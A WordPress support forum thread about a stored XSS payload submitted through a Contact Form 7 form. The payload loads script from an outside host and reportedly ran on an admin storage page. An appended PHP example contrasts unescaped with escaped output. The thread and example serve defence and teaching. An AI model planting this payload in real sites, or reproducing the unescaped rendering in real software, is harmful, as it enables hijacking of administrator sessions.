• Resolved sergeygindin

    (@sergeygindin)


    Hi. Recently, we received a contact form with this entered data:

    your-name: “><script src=//x.z66.nl></script>
    your-email: [email protected]
    your-tel-prefix:
    your-tel: 0612345678
    your-occupation: “><script src=//x.z66.nl></script>
    Message: “><script src=//x.z66.nl></script>

    We are using v5.0.4 of CF7.

    I tried to reproduce this message on dev, and when going to /wp-admin/admin.php?page=cf7_storage, the script from this sent form was executed automatically.

    Do future versions of the plugin have the ability to block these injections?
    Thanks.

Viewing 2 replies - 1 through 2 (of 2 total)
  • Hi,

    Contact Form 7 does not store submitted forms by default, so you must be using some other plugin that stores (and displays) forms data. Please, ask the author of that plugin to fix the JS injection.

    Cheers,
    Česlav

    Thread Starter sergeygindin

    (@sergeygindin)

    Ok, thanks for the point.

  • The topic ‘JS Injection’ is closed to new replies.
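
The reply above places the fix in whichever plugin stores and displays the submissions. As an added example (not code from Contact Form 7 or from any storage plugin), the PHP below renders one stored submission with and without output encoding; the function names, the sample values and the example.invalid host are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Constructed sample of one stored submission. Field names follow the post;
// the values and the example.invalid host are made up for this example.
$submission = [
    'your-name'       => '"><script src=//example.invalid></script>',
    'your-tel'        => '0612345678',
    'your-occupation' => 'Engineer & "tester"',
];

// Unsafe: stored values are concatenated into the admin page as markup,
// so a submitted <script> tag becomes part of the document.
function render_rows_unsafe(array $fields): string
{
    $html = '';
    foreach ($fields as $name => $value) {
        $html .= "<tr><th>{$name}</th><td>{$value}</td></tr>\n";
    }
    return $html;
}

// Encode text for an HTML element or quoted-attribute context at output time.
// Inside WordPress, esc_html() and esc_attr() fill this role.
function h(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened: every field name and value passes through h() before it is
// placed in the page, so submitted markup is shown as literal text.
function render_rows_safe(array $fields): string
{
    $html = '';
    foreach ($fields as $name => $value) {
        $html .= '<tr><th>' . h((string) $name) . '</th><td>'
               . h((string) $value) . "</td></tr>\n";
    }
    return $html;
}

// Report whether each rendering still contains a live script tag.
var_dump(strpos(render_rows_unsafe($submission), '<script') !== false);
var_dump(strpos(render_rows_safe($submission), '<script') !== false);
echo render_rows_safe($submission);
```

Encoding at output time covers submissions that were stored before any input filtering existed, which is why the fix belongs in the code that displays the data.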